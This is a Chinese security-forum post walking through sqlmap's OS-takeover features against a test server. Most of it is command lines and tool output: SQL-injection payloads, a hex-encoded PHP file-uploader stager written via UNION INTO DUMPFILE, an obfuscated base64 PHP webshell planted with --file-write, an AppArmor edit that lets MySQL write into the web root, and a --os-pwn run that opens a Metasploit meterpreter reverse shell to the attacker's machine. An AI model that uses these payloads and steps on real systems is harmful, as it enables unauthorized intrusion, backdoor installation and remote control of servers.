切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
275 SQLMAP shell — linux[复制链接]
发表于 2012-9-28 23:54:07 | 显示全部楼层 |!read_mode!
  1. root@ubuntu:~# apt-get install policycoreutils
复制代码

装这个先 在SERVER

–os-shell
  1. root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --os-shell
  2. which web application language does the web server support?
  3. [1] ASP
  4. [2] ASPX
  5. [3] PHP (default)
  6. [4] JSP
  7. > 3
  8. please provide the web server document root [/var/www/]: /tmp/
  9. [20:34:37] [WARNING] unable to retrieve any web server path
  10. please provide any additional web server full path to try to upload the agent [Enter for None]:
  11. [20:34:38] [WARNING] unable to upload the file stager on '/tmp'
  12. [20:34:38] [INFO] trying to upload the file stager via UNION technique
  13. [20:34:38] [WARNING] reflective value(s) found and filtering out
  14. do you want confirmation that the file '/tmp/tmpuhewz.php' has been successfully written on the back-end DBMS file system? [Y/n]
  15. [20:34:40] [INFO] the file has been successfully written and its size is 721 bytes, but the size differs from the local file '/tmp/tmpVkGTh7' (703 bytes)
  16. [20:34:40] [WARNING] expect junk characters inside the file as a leftover from UNION query
  17. [20:34:40] [WARNING] unable to upload the file stager on '/tmp/pen'
  18. [20:34:40] [INFO] trying to upload the file stager via UNION technique
  19. do you want confirmation that the file '/tmp/pen/tmpuhewz.php' has been successfully written on the back-end DBMS file system? [Y/n]
  20. [20:34:41] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
  21. [20:34:41] [WARNING] HTTP error codes detected during testing:
  22. 404 (Not Found) - 4 times
  23. [20:34:41] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.8'

  24. [*] shutting down at 20:34:41
复制代码
写到TMP目录 加个参数 -v10 显示详细信息 root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 –os-shell -v10

  1. [20:35:31] [WARNING] unable to upload the file stager on '/tmp'
  2. [20:35:31] [INFO] trying to upload the file stager via UNION technique
  3. [20:35:31] [DEBUG] encoding file to its hexadecimal string value
  4. [20:35:31] [DEBUG] exporting the text file content to file '/tmp/tmpunnea.php'
  5. [20:35:31] [PAYLOAD] 1 LIMIT 0,1 UNION ALL SELECT NULL,0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5752495441424c455f4449523e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a INTO DUMPFILE '/tmp/tmpunnea.php'#
复制代码

语句出来了 查看一下

  1. root@ubuntu:/tmp# cat tmpuevnx.php
  2. 0000000001        hacked By helen<?php
  3. if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/tmp> <input type=submit name=upload value=upload></form>";}?>
  4. root@ubuntu:/tmp#
复制代码
如果要写到WEB目录,前提当年目录要有写入权限,跟目录很少会有,你可以找他的图片目录 上传目录 HTML生成目录 备份目录
#UBUNTU默认装的APACHE和MYQSL 写不到WWW目录 即使是777权限!
因为MYSQL被apparmor列入黑名单了

  1. root@ubuntu:/etc/mysql# aa-status | grep mysql
  2.    /usr/sbin/mysqld
  3.    /usr/sbin/mysqld (4468)
  4. root@ubuntu:/etc/mysql#
复制代码

nano /etc/apparmor.d/usr.sbin.mysqld
在:
/sys/devices/system/cpu/ r,
后面加
/var/www/* rw,
重启:
  1. root@ubuntu:/etc/mysql# /etc/init.d/apparmor reload
  2. * Reloading AppArmor profiles                                                                                        [ OK ]
复制代码

能写了
  1. root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --os-shell
  2. [21:05:27] [WARNING] unable to retrieve the web server document root
  3. please provide the web server document root [/var/www/]:
  4. [21:05:28] [WARNING] unable to retrieve any web server path
  5. please provide any additional web server full path to try to upload the agent [Enter for None]:
  6. [21:05:29] [INFO] the file stager has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpuwbao.php
  7. [21:05:39] [INFO] the backdoor has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpbjpzi.php
  8. [21:05:39] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
  9. os-shell> ps -ef
  10. do you want to retrieve the command standard output? [Y/n/a] Y
  11. command standard output:
  12. ---
  13. UID        PID  PPID  C STIME TTY          TIME CMD
  14. root         1     0  0 10:43 ?        00:00:00 /sbin/init
  15. root         2     0  0 10:43 ?        00:00:00 [kthreadd]
  16. root         3     2  0 10:43 ?        00:00:00 [ksoftirqd/0]
  17. root         4     2  0 10:43 ?        00:00:00 [migration/0]
  18. root         5     2  0 10:43 ?        00:00:00 [watchdog/0]
复制代码

或者你可以访问
  1. [21:05:29] [INFO] the file stager has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpuwbao.php
复制代码



指定SHELL

–file-write=/本地/shell.php –file-dest=/远程/shell.php

  1. root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --file-write=/pen/door/Weevely/123 --file-dest=/tmp/v5 --os=linux --dbms=mysql

  2.     sqlmap/1.0-dev-dbce417 - automatic SQL injection and database takeover tool

  3. http://sqlmap.org

  4. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

  5. [*] starting at 20:47:58

  6. [20:47:58] [INFO] testing connection to the target url
  7. [20:47:58] [INFO] heuristics detected web page charset 'ascii'
  8. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  9. ---
  10. Place: GET
  11. Parameter: id
  12.     Type: boolean-based blind
  13.     Title: AND boolean-based blind - WHERE or HAVING clause
  14.     Payload: id=1 AND 7964=7964

  15.     Type: error-based
  16.     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  17.     Payload: id=1 AND (SELECT 6057 FROM(SELECT COUNT(*),CONCAT(0x3a6774693a,(SELECT (CASE WHEN (6057=6057) THEN 1 ELSE 0 END)),0x3a70737a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

  18.     Type: UNION query
  19.     Title: MySQL UNION query (NULL) - 2 columns
  20.     Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x3a6774693a,0x73676c795569626f6a56,0x3a70737a3a)#

  21.     Type: AND/OR time-based blind
  22.     Title: MySQL > 5.0.11 AND time-based blind
  23.     Payload: id=1 AND SLEEP(5)
  24. ---
  25. [20:47:58] [INFO] testing MySQL
  26. [20:47:58] [INFO] confirming MySQL
  27. [20:47:58] [INFO] the back-end DBMS is MySQL
  28. web server operating system: Linux Ubuntu 10.10 (Maverick Meerkat)
  29. web application technology: PHP 5.3.3, Apache 2.2.16
  30. back-end DBMS: MySQL >= 5.0.0
  31. do you want confirmation that the file '/tmp/v5' has been successfully written on the back-end DBMS file system? [Y/n] Y
  32. [20:48:00] [INFO] the file has been successfully written and its size is 605 bytes, but the size differs from the local file '/pen/door/Weevely/123' (588 bytes)
  33. [20:48:00] [WARNING] expect junk characters inside the file as a leftover from UNION query
  34. [20:48:00] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.8'

  35. [*] shutting down at 20:48:00

  36. root@Dis9Team:~#
复制代码
查看一下

  1. root@ubuntu:/tmp# cat v5
  2. 1hacked By helen<?php
  3. $moa = str_replace("en","","stenren_reneenpenlenaencene");
  4. $cs="GxhpcY2UoYXJyYXkoJpcypc9bXlx3PVpcxzXS8nLpcCcvXHMvJyksIGFycmF5KCcnLCcpcrJykpcsI";
  5. $kz="GppcvaW4opcYXJyYXpclpcfc2xpY2UoJGEsJGMoJGEpLTMpKSkpKTtlY2hpcvICc8LycuJpcGsuJz4nOpc30=";
  6. $sj="JGM9J2NvdW50JzskpcYpcT0kX0NPpcT0tJRpcTtppcZipchyZXNldpcCgkYSk9PSd0ZpcScgJiYgJpcG";
  7. $cw="MoJGEpPjMpeyRrPSdzdCc7ZWNobyAnPCpccuJGsuJz4npcO2V2YpcWwoYmFzZTY0X2RlY29kpcZShwcmpcVnX3Jlcpc";
  8. $mx = $moa("v", "", "vbavsvev6v4v_vdvevcode");
  9. $cd = $moa("l","","lcrleatel_lflunlcltioln");
  10. $irk = $cd('', $mx($moa("pc", "", $sj.$cw.$cs.$kz))); $irk();
  11. ?>root@ubuntu:/tmp#
复制代码

–os-pwn

配合MSF 不稳定哦

  1. root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --os-pwn
  2. which web application language does the web server support?
  3. [1] ASP
  4. [2] ASPX
  5. [3] PHP (default)
  6. [4] JSP
  7. > 3
  8. [21:08:03] [WARNING] unable to retrieve the web server document root
  9. please provide the web server document root [/var/www/]:
  10. [21:08:12] [WARNING] unable to retrieve any web server path
  11. please provide any additional web server full path to try to upload the agent [Enter for None]:
  12. [21:08:13] [INFO] the file stager has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpuwydk.php
  13. [21:08:13] [INFO] the file stager has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpuwydk.php
  14. [21:08:23] [INFO] the backdoor has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpbakhx.php
  15. [21:08:23] [INFO] creating Metasploit Framework multi-stage shellcode
复制代码
选择SHELL [2] Bind TCP: Listen on the database host for a connection 最好

  1. which connection type do you want to use?
  2. [1] Reverse TCP: Connect back from the database host to this machine (default)
  3. [2] Bind TCP: Listen on the database host for a connection
  4. > 1
  5. which is the local address? [5.5.5.14] 5.5.5.14
  6. which local port number do you want to use? [24896] 5412
  7. which payload do you want to use?
  8. [1] Shell (default)
  9. [2] Meterpreter (beta)
  10. > 2
  11. [21:08:56] [INFO] creation in progress ........................ done
  12. what is the back-end database management system architecture?
  13. [1] 32-bit (default)
  14. [2] 64-bit
  15. > 1
  16. [21:09:24] [INFO] uploading shellcodeexec to '/var/www/shellcodeexec.x32'
  17. [21:09:24] [INFO] running Metasploit Framework command line interface locally, please wait..
  18. PAYLOAD => linux/x86/meterpreter/reverse_tcp
  19. EXITFUNC => process
  20. LPORT => 5412
  21. LHOST => 5.5.5.14
  22. [*] Started reverse handler on 5.5.5.14:5412
  23. [*] Starting the payload handler...
  24. [21:10:18] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
  25. [*] Transmitting intermediate stager for over-sized stage...(100 bytes)
  26. [*] Sending stage (1126400 bytes) to 5.5.5.8
复制代码




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-26 09:18

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部